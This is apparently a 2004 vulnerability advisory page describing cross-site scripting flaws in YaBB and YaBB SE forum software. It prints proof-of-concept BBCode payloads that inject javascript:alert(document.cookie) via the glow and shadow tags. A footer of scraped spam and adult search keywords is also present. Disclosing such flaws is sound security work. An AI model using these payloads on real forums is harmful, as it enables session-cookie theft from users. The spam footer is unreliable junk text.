about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , YABB/YABB SE Multiple Cross-Site Scripting Vulnerabilites


Title YABB/YABB SE Multiple Cross-Site Scripting Vulnerabilites
Published 2004-03-15-12:00AM
Updated 2004-09-22-01:48PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery of this issue is credited to Cheng Peng Su <apple_soup@msn.com> this issue was also independently discovered by frog-m@n.
Vulnerable  YaBB SE YaBB SE 1.5.1
YaBB SE Simple Machines SMF 1.0 b
YaBB YaBB 1 Gold SP 1.3
Not Vulnerable  YaBB YaBB 1 Gold - SP 1.3.2
Code   No exploit is required to leverage this issue. The following proof of concept has been provided:

[glow=red);background:url(javascript:alert(document.cookie));filter:glow(color=red,2,300]Big Exploit[/glow]

[shadow=red);background:url(javascript:alert(document.cookie));filter:shadow(color=red,left,300]Big Exploit[/shadow]

The following proof of concept has been supplied by frog-m@n:
[glow=red,2);background:url(javascript:[SCRIPT],300]text[/glow]
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 05 Dec 2008 17:14:56 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
22796.html www.bntjo. SHAKIRAWHE SEX.GIRL.C WAP.OVOA.C Studentsex www.xshyxs afpovertcp wwww89com free nude www.89.co news for c Www. Video www+mallum Girls havi www.89.co worldswx.c free nude free nude /index.php PHP 4 apac www.carros t885t 2.6.-34 www,pink w indiansexh karina kap sexholl fantasti.c Dolphin Sm Dolphin Sm karina kap Crack Data t885t hinata and php nuke d Www.Indian 24033.html HotVideo.W Sania mirz mambo Remo www.gold4r php nuke d Sexy gerls Sexlives.c free women nudephotoe vidos sex chut ki ch Bruning